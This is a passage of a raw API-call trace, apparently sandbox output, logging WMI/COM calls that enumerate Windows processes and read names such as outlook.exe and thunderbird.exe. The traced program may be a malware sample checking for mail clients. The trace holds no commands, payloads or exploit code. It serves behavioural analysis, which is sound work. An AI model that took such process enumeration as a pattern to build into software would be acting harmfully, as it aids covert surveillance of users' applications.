[0279.515] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.516] WbemDefPath:IUnknown:AddRef (This=0x570df28) returned 0x3 [0279.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b188) returned 0x0 [0279.516] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b188, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.516] WbemDefPath:IUnknown:Release (This=0x570b188) returned 0x3 [0279.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.516] WbemDefPath:IUnknown:Release (This=0x570df28) returned 0x2 [0279.517] WbemDefPath:IUnknown:Release (This=0x570df28) returned 0x1 [0279.517] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570df28) returned 0x0 [0279.517] WbemDefPath:IUnknown:AddRef (This=0x570df28) returned 0x3 [0279.517] WbemDefPath:IUnknown:Release (This=0x570df28) returned 0x2 [0279.517] WbemDefPath:IWbemPath:SetText (This=0x570df28, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x0 [0279.517] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.517] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.517] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.517] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.517] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.517] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.517] IWbemClassObject:Get (in: This=0x57054c8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cec8c*=0, plFlavor=0x27cec90*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x27cec8c*=8, plFlavor=0x27cec90*=0) returned 0x0 [0279.517] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0279.517] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0279.518] IWbemClassObject:Get (in: This=0x57054c8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cec8c*=8, plFlavor=0x27cec90*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x27cec8c*=8, plFlavor=0x27cec90*=0) returned 0x0 [0279.518] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0279.518] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0279.518] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b1b8, puReturned=0x27bb39c | out: apObjects=0x570b1b8*=0x5712260, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.519] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712260) returned 0x0 [0279.519] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.519] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.520] IUnknown:AddRef (This=0x5712260) returned 0x3 [0279.520] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.520] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.520] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5712264) returned 0x0 [0279.520] IMarshal:GetUnmarshalClass (in: This=0x5712264, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.520] IUnknown:Release (This=0x5712264) returned 0x3 [0279.521] IUnknown:QueryInterface (in: This=0x5712260, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.521] IUnknown:Release (This=0x5712260) returned 0x2 [0279.521] IUnknown:QueryInterface (in: This=0x5712260, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712260) returned 0x0 [0279.521] IUnknown:AddRef (This=0x5712260) returned 0x4 [0279.521] IUnknown:Release (This=0x5712260) returned 0x3 [0279.521] IUnknown:Release (This=0x5712260) returned 0x2 [0279.521] CoTaskMemFree (pv=0x570b1b8) [0279.522] IUnknown:AddRef (This=0x5712260) returned 0x3 [0279.522] IWbemClassObject:Get (in: This=0x5712260, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.523] IWbemClassObject:Get (in: This=0x5712260, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.523] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"") returned 0x66 [0279.523] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"") returned 0x66 [0279.523] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.523] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.523] IUnknown:Release (This=0x500344) returned 0x1 [0279.524] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b1b8) returned 0x0 [0279.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b1b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.524] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b1b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e008) returned 0x0 [0279.524] WbemDefPath:IUnknown:Release (This=0x570b1b8) returned 0x0 [0279.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e008) returned 0x0 [0279.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.525] WbemDefPath:IUnknown:AddRef (This=0x570e008) returned 0x3 [0279.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b1c8) returned 0x0 [0279.525] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b1c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.525] WbemDefPath:IUnknown:Release (This=0x570b1c8) returned 0x3 [0279.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.526] WbemDefPath:IUnknown:Release (This=0x570e008) returned 0x2 [0279.526] WbemDefPath:IUnknown:Release (This=0x570e008) returned 0x1 [0279.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e008, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e008) returned 0x0 [0279.526] WbemDefPath:IUnknown:AddRef (This=0x570e008) returned 0x3 [0279.526] WbemDefPath:IUnknown:Release (This=0x570e008) returned 0x2 [0279.526] WbemDefPath:IWbemPath:SetText (This=0x570e008, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"") returned 0x0 [0279.526] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.526] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.526] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.526] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.526] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.526] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.527] IWbemClassObject:Get (in: This=0x5712260, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cf4f8*=0, plFlavor=0x27cf4fc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x27cf4f8*=8, plFlavor=0x27cf4fc*=0) returned 0x0 [0279.527] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0279.527] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0279.527] IWbemClassObject:Get (in: This=0x5712260, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cf4f8*=8, plFlavor=0x27cf4fc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x27cf4f8*=8, plFlavor=0x27cf4fc*=0) returned 0x0 [0279.527] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0279.527] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0279.527] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b1f8, puReturned=0x27bb39c | out: apObjects=0x570b1f8*=0x57123f8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.529] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57123f8) returned 0x0 [0279.529] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.529] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.529] IUnknown:AddRef (This=0x57123f8) returned 0x3 [0279.530] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.530] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.530] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57123fc) returned 0x0 [0279.530] IMarshal:GetUnmarshalClass (in: This=0x57123fc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.530] IUnknown:Release (This=0x57123fc) returned 0x3 [0279.530] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.530] IUnknown:Release (This=0x57123f8) returned 0x2 [0279.530] IUnknown:QueryInterface (in: This=0x57123f8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57123f8) returned 0x0 [0279.531] IUnknown:AddRef (This=0x57123f8) returned 0x4 [0279.531] IUnknown:Release (This=0x57123f8) returned 0x3 [0279.531] IUnknown:Release (This=0x57123f8) returned 0x2 [0279.531] CoTaskMemFree (pv=0x570b1f8) [0279.531] IUnknown:AddRef (This=0x57123f8) returned 0x3 [0279.531] IWbemClassObject:Get (in: This=0x57123f8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.532] IWbemClassObject:Get (in: This=0x57123f8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.532] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x66 [0279.532] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x66 [0279.532] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.532] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.532] IUnknown:Release (This=0x500344) returned 0x1 [0279.533] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b1f8) returned 0x0 [0279.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b1f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.533] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b1f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e0e8) returned 0x0 [0279.534] WbemDefPath:IUnknown:Release (This=0x570b1f8) returned 0x0 [0279.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e0e8) returned 0x0 [0279.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.534] WbemDefPath:IUnknown:AddRef (This=0x570e0e8) returned 0x3 [0279.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x71d71388*(Data1=0x3, 